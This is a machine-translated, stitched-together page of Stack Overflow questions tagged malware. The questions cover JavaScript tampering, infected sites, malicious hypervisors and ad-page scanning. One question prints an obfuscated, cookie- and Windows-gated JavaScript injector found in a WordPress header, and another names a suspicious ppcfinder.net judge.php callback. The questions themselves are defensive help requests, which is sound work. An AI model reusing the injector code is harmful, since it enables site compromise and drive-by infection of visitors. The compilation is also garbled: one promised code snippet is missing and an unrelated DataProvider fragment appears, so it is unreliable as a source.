问题标签 [malware]

有没有办法阻止或使其变得足够困难，让某人注入 Javascript 并操纵变量或访问函数？我的一个想法是在每次重新加载时随机更改所有 var 名称，以便每次都需要重写恶意软件脚本？或者还有其他不那么痛苦的方法吗？

我知道最终有人会闯入，但我想知道如何使重现动作变得困难，这样人们就不会发布书签或类似的东西供所有人使用。我不在乎专家是否在代码中找到自己的方式，但我希望它比javascript:d=0;

如果你知道如何让破解 Javascript 变得更加困难，请写下这些。

如何删除 TBS WMP 插件？这似乎是我的计算机上安装的恶意软件。非常感谢！

我正在完成一个我没有建立的网站的开发（我设计了它，但到目前为止已经建立了它），最近当我在 Chrome 中访问该网站时，我得到一个“检测到恶意软件！” 警告框。

该网站是http://kenbrook.org/针对夏令营的，它是一个基本的宣传册类型网站，包含您的平均营销内容。它建立在 ModX 内容管理框架之上，并使用了一些插件。

我不知道这是如何或来自什么，或者如何处理它。在解决此站点的另一个问题（与 CSS 相关）时，另一个 stackoverflow 问题中的用户提到了有关该恶意软件问题的见解：使用 firefox webdeveloper 工具栏编辑 CSS 时，为什么打开工具栏时某些图像会消失？

我什至不确定该脚本在网站上的用途是什么？！谁能给我关于这个问题的任何见解以及我应该如何开始解决它？我现在负责它，所以“回到原来的开发者那里让他解决”不是一种选择。

如果您不想访问该网站，以下是 Chrome 给我的警告文本：

警告：访问此站点可能会损坏您的计算机！kenbrook.org 网站包含来自网站 www.spiritek.co.jp 的元素，该网站似乎包含恶意软件——可能会损害您的计算机或在未经您同意的情况下以其他方式运行的软件。仅仅访问包含恶意软件的网站就可能感染您的计算机。有关这些元素问题的详细信息，请访问 www.spiritek.co.jp 的 Google 安全浏览诊断页面。详细了解如何保护自己免受在线有害软件的侵害。我了解访问本网站可能会损坏我的电脑。

我正在尝试查找有关 Virt-ICE 的信息，这是一种在最近的Black Hat 会议上展示的恶意软件调试器/分析工具。我已阅读白皮书Virt-ICE：用于恶意软件分析的下一代调试器，现在正在寻找更多内容。这听起来很迷人，我很想深入挖掘。

这是我发现的：

• 整洁的海报摘要
• 开创性论文：Virt-ICE：用于恶意软件分析的下一代调试器
• Black Hat 的演示幻灯片

我一直在阅读虚拟化安全性并遇到了 Blue Pill，一个恶意瘦虚拟机管理程序（项目网站已关闭，存档版本在这里： http://web.archive.org/web/20080418123748/http: //www.bluepillproject。组织/）。

我的问题是：自定义恶意管理程序是否可以修改执行流程、注入和执行任意代码、查看虚拟机 RAM 中的私有信息或其他任何内容？

我不是在问从恶意软件的角度来看这是否实用（为了实现这些功能，它可能会变成一个庞大且不切实际的后门）。我对恶意管理程序是否可以完全控制虚拟机的各个方面感兴趣。

当涉及到像 VirtualBox 这样的程序时，这会有什么不同 - 主机操作系统可以在它选择的任何时间在来宾内部执行任意代码吗？

任何想法将不胜感激！

提前致谢，

r3mo

我正在建立一个系统来控制我公司广告的放置位置。我们的担忧之一是目标页面上的潜在恶意代码。是否有任何库/数据库/系统可以检测此内容并且是开源的或免费的？

~唐纳

我有一个 WordPress 安装，它已成为网络钓鱼操作的主要目标。我以为我已经涵盖了大部分安全性，除了我在标题中发现了这个：

var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};

最后的那个网址非常可疑。我用谷歌搜索但没有找到线索:-(

我还没有在我的 WP 安装中找到代码的来源。它没有写入模板文件或数据库。现在正在更新 WP 安装。

有没有人有这方面的知识？

任何人都可以解码吗？我尝试了所有的 js foo，查看了 jsunpack，但无法弄清楚。一个被列入黑名单的网站有这个，所以我认为这是罪魁祸首。

这是代码片段：

它工作正常，但我认为这不是“正确”的方式......

如果用户更改 DataProvider 怎么办？

我想知道是否有人看过这个。我正在开发一个网络应用程序，当我进行一些测试时，开发服务器只输出以下内容。

预计 /ppcfinder.net/judge.php 行之前的所有内容，我不知道这个 Judge.php 在做什么或它来自哪里。我的输出再次开始于

我搜索了所有 Python / django 源代码，以防万一我在那里发现了一些讨厌的东西，但什么也没有。我搜索了所有我自己的来源，它也不在那里。

它到底是什么，它是从哪里来的。上周我也看到了，但是没找到。上周，judge.php 是通过 IP 地址而不是 ppcfinder.net URL 访问的。我在关闭 Javascript 后查看了 ppcfinder.net，它似乎是一个垃圾搜索网站。万一某些东西嵌入到 Python 源代码的某个地方并且可能正在窃取东西但我找不到它，这有点可怕。

有人见过这个吗？

富有的